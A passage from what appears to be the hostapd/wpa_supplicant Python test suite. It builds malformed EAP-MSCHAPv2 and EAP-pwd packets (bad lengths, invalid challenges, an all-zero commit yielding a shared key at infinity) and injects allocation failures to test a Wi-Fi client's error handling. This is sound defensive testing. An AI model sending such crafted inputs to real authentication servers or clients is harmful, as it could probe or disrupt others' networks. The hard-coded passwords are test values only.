EAP_TYPE_MSCHAPV2,
3, 0, 5, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure before challenge - required challenge field not present")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
4, 0, 5, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure before challenge - invalid failure challenge len")
payload = 'C=12'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure before challenge - invalid failure challenge len")
payload = 'C=12 V=3'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure before challenge - invalid failure challenge")
payload = 'C=00112233445566778899aabbccddeefQ '
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure before challenge - password expired")
payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success after password change")
payload = "S=1122334455667788990011223344556677889900"
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
3, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid challenge length")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short challenge packet")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1, 16)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1 + 16 + 6,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1 + 16 + 6, 16) + 16*'A' + 'foobar'
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure - password expired")
payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success after password change")
if len(req) != 591:
logger.info("Unexpected Change-Password packet length: %s" % len(req))
return None
data = req[9:]
enc_pw = data[0:516]
data = data[516:]
enc_hash = data[0:16]
data = data[16:]
peer_challenge = data[0:16]
data = data[16:]
# Reserved
data = data[8:]
nt_response = data[0:24]
data = data[24:]
flags = data
logger.info("enc_hash: " + enc_hash.encode("hex"))
logger.info("peer_challenge: " + peer_challenge.encode("hex"))
logger.info("nt_response: " + nt_response.encode("hex"))
logger.info("flags: " + flags.encode("hex"))
auth_challenge = binascii.unhexlify("00112233445566778899aabbccddeeff")
logger.info("auth_challenge: " + auth_challenge.encode("hex"))
auth_resp = GenerateAuthenticatorResponse("new-pw", nt_response,
peer_challenge,
auth_challenge, "user")
payload = "S=" + auth_resp.encode('hex').upper()
logger.info("Success message payload: " + payload)
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
3, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure - password expired")
payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success after password change")
if len(req) != 591:
logger.info("Unexpected Change-Password packet length: %s" % len(req))
return None
data = req[9:]
enc_pw = data[0:516]
data = data[516:]
enc_hash = data[0:16]
data = data[16:]
peer_challenge = data[0:16]
data = data[16:]
# Reserved
data = data[8:]
nt_response = data[0:24]
data = data[24:]
flags = data
logger.info("enc_hash: " + enc_hash.encode("hex"))
logger.info("peer_challenge: " + peer_challenge.encode("hex"))
logger.info("nt_response: " + nt_response.encode("hex"))
logger.info("flags: " + flags.encode("hex"))
auth_challenge = binascii.unhexlify("00112233445566778899aabbccddeeff")
logger.info("auth_challenge: " + auth_challenge.encode("hex"))
auth_resp = GenerateAuthenticatorResponse("new-pw", nt_response,
peer_challenge,
auth_challenge, "user")
payload = "S=" + auth_resp.encode('hex').upper()
logger.info("Success message payload: " + payload)
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
3, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1 + 16 + 6,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1 + 16 + 6, 16) + 16*'A' + 'foobar'
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure - authentication failure")
payload = 'E=691 R=1 C=00112233445566778899aabbccddeeff V=3 M=Authentication failed'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1 + 16 + 6,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1 + 16 + 6, 16) + 16*'A' + 'foobar'
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure - authentication failure")
payload = 'E=691 R=1 C=00112233445566778899aabbccddeeff V=3 M=Authentication failed (2)'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge - invalid ms_len and workaround disabled")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1 + 16 + 6,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1 + 16 + 6 + 1, 16) + 16*'A' + 'foobar'
return None
srv = start_radius_server(mschapv2_handler)
try:
hapd = start_ap(apdev[0])
for i in range(0, 16):
logger.info("RUN: %d" % i)
if i == 12:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
wait_connect=False)
elif i == 14:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
phase2="mschapv2_retry=0",
password="password", wait_connect=False)
elif i == 15:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
eap_workaround="0",
password="password", wait_connect=False)
else:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
password="password", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 8, 11, 12 ]:
ev = dev[0].wait_event(["CTRL-REQ-NEW_PASSWORD"],
timeout=10)
if ev is None:
raise Exception("Timeout on new password request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-NEW_PASSWORD-" + id + ":new-pw")
if i in [ 11, 12 ]:
ev = dev[0].wait_event(["CTRL-EVENT-PASSWORD-CHANGED"],
timeout=10)
if ev is None:
raise Exception("Timeout on password change")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP success")
else:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
if i in [ 13 ]:
ev = dev[0].wait_event(["CTRL-REQ-IDENTITY"],
timeout=10)
if ev is None:
raise Exception("Timeout on identity request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-IDENTITY-" + id + ":user")
ev = dev[0].wait_event(["CTRL-REQ-PASSWORD"],
timeout=10)
if ev is None:
raise Exception("Timeout on password request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-PASSWORD-" + id + ":password")
# TODO: Does this work correctly?
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
if i in [ 4, 5, 6, 7, 14 ]:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
else:
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
finally:
stop_radius_server(srv)
def test_eap_proto_mschapv2_errors(dev, apdev):
"""EAP-MSCHAPv2 protocol tests (error paths)"""
check_eap_capa(dev[0], "MSCHAPV2")
def mschapv2_fail_password_expired(ctx):
logger.info("Test: Failure before challenge - password expired")
payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
def mschapv2_success_after_password_change(ctx, req=None):
logger.info("Test: Success after password change")
if req is None or len(req) != 591:
payload = "S=1122334455667788990011223344556677889900"
else:
data = req[9:]
enc_pw = data[0:516]
data = data[516:]
enc_hash = data[0:16]
data = data[16:]
peer_challenge = data[0:16]
data = data[16:]
# Reserved
data = data[8:]
nt_response = data[0:24]
data = data[24:]
flags = data
logger.info("enc_hash: " + enc_hash.encode("hex"))
logger.info("peer_challenge: " + peer_challenge.encode("hex"))
logger.info("nt_response: " + nt_response.encode("hex"))
logger.info("flags: " + flags.encode("hex"))
auth_challenge = binascii.unhexlify("00112233445566778899aabbccddeeff")
logger.info("auth_challenge: " + auth_challenge.encode("hex"))
auth_resp = GenerateAuthenticatorResponse("new-pw", nt_response,
peer_challenge,
auth_challenge, "user")
payload = "S=" + auth_resp.encode('hex').upper()
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
3, 0, 4 + len(payload)) + payload
def mschapv2_handler(ctx, req):
logger.info("mschapv2_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(mschapv2_handler)
try:
hapd = start_ap(apdev[0])
tests = [ "os_get_random;eap_mschapv2_change_password",
"generate_nt_response;eap_mschapv2_change_password",
"get_master_key;eap_mschapv2_change_password",
"nt_password_hash;eap_mschapv2_change_password",
"old_nt_password_hash_encrypted_with_new_nt_password_hash" ]
for func in tests:
with fail_test(dev[0], 1, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
password="password", wait_connect=False)
ev = dev[0].wait_event(["CTRL-REQ-NEW_PASSWORD"], timeout=10)
if ev is None:
raise Exception("Timeout on new password request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-NEW_PASSWORD-" + id + ":new-pw")
time.sleep(0.1)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
tests = [ "encrypt_pw_block_with_password_hash;eap_mschapv2_change_password",
"nt_password_hash;eap_mschapv2_change_password",
"nt_password_hash;eap_mschapv2_success" ]
for func in tests:
with fail_test(dev[0], 1, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-REQ-NEW_PASSWORD"], timeout=10)
if ev is None:
raise Exception("Timeout on new password request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-NEW_PASSWORD-" + id + ":new-pw")
time.sleep(0.1)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
tests = [ "eap_msg_alloc;eap_mschapv2_change_password" ]
for func in tests:
with alloc_fail(dev[0], 1, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
password="password", wait_connect=False)
ev = dev[0].wait_event(["CTRL-REQ-NEW_PASSWORD"], timeout=10)
if ev is None:
raise Exception("Timeout on new password request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-NEW_PASSWORD-" + id + ":new-pw")
time.sleep(0.1)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
finally:
stop_radius_server(srv)
def test_eap_proto_pwd(dev, apdev):
"""EAP-pwd protocol tests"""
check_eap_capa(dev[0], "PWD")
global eap_proto_pwd_test_done, eap_proto_pwd_test_wait
eap_proto_pwd_test_done = False
eap_proto_pwd_test_wait = False
def pwd_handler(ctx, req):
logger.info("pwd_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
global eap_proto_pwd_test_wait
eap_proto_pwd_test_wait = False
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'], 4 + 1,
EAP_TYPE_PWD)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing Total-Length field")
payload = struct.pack("B", 0x80)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too large Total-Length")
payload = struct.pack(">BH", 0x80, 65535)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: First fragment")
payload = struct.pack(">BH", 0xc0, 10)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Total-Length value in the second fragment")
payload = struct.pack(">BH", 0x80, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: First and only fragment")
payload = struct.pack(">BH", 0x80, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: First and only fragment with extra data")
payload = struct.pack(">BHB", 0x80, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: First fragment")
payload = struct.pack(">BHB", 0xc0, 2, 1)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Extra data in the second fragment")
payload = struct.pack(">BBB", 0x0, 2, 3)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short id exchange")
payload = struct.pack(">B", 0x01)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported rand func in id exchange")
payload = struct.pack(">BHBBLB", 0x01, 0, 0, 0, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported prf in id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 0, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported password pre-processing technique in id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 255)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Valid id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected commit exchange")
payload = struct.pack(">B", 0x02)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Valid id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Commit payload length")
payload = struct.pack(">B", 0x02)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Valid id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Commit payload with all zeros values --> Shared key at infinity")
payload = struct.pack(">B", 0x02) + 96*'\0'
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Valid id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Commit payload with valid values")
element = binascii.unhexlify("8dcab2862c5396839a6bac0c689ff03d962863108e7c275bbf1d6eedf634ee832a214db99f0d0a1a6317733eecdd97f0fc4cda19f57e1bb9bb9c8dcf8c60ba6f")
scalar = binascii.unhexlify("450f31e058cf2ac2636a5d6e2b3c70b1fcc301957f0716e77f13aa69f9a2e5bd")
payload = struct.pack(">B", 0x02) + element + scalar
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Confirm payload length 0")
payload = struct.pack(">B", 0x03)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Valid id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Commit payload with valid values")
element = binascii.unhexlify("8dcab2862c5396839a6bac0c689ff03d962863108e7c275bbf1d6eedf634ee832a214db99f0d0a1a6317733eecdd97f0fc4cda19f57e1bb9bb9c8dcf8c60ba6f")
scalar = binascii.unhexlify("450f31e058cf2ac2636a5d6e2b3c70b1fcc301957f0716e77f13aa69f9a2e5bd")
payload = struct.pack(">B", 0x02) + element + scalar
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Confirm payload with incorrect value")
payload = struct.pack(">B", 0x03) + 32*'\0'
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected confirm exchange")
payload = struct.pack(">B", 0x03)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
logger.info("No more test responses available - test case completed")
global eap_proto_pwd_test_done
eap_proto_pwd_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(pwd_handler)
try:
hapd = start_ap(apdev[0])
i = 0
while not eap_proto_pwd_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ok = False
for j in range(5):
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STATUS",
"CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
if "CTRL-EVENT-EAP-PROPOSED-METHOD" in ev:
ok = True
break
if "CTRL-EVENT-EAP-STATUS" in ev and "status='completion' parameter='failure'" in ev:
ok = True
break
if not ok:
raise Exception("Expected EAP event not seen")
if eap_proto_pwd_test_wait:
for k in range(10):
time.sleep(0.1)
if not eap_proto_pwd_test_wait:
break
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_pwd_errors(dev, apdev):
"""EAP-pwd local error cases"""
check_eap_capa(dev[0], "PWD")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(1, 4):
with alloc_fail(dev[0], i, "eap_pwd_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "eap_pwd_get_session_id"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
fragment_size="0",
password="secret password")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
funcs = [ "eap_pwd_getkey", "eap_pwd_get_emsk" ]
for func in funcs:
with alloc_fail(dev[0], 1, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user@domain",
password="secret password", erp="1",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
for i in range(1, 5):
with alloc_fail(dev[0], i, "eap_pwd_perform_id_exchange"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_ALLOC_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No allocation failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "wpabuf_alloc;eap_pwd_perform_id_exchange"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
for i in range(1, 9):
with alloc_fail(dev[0], i, "eap_pwd_perform_commit_exchange"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
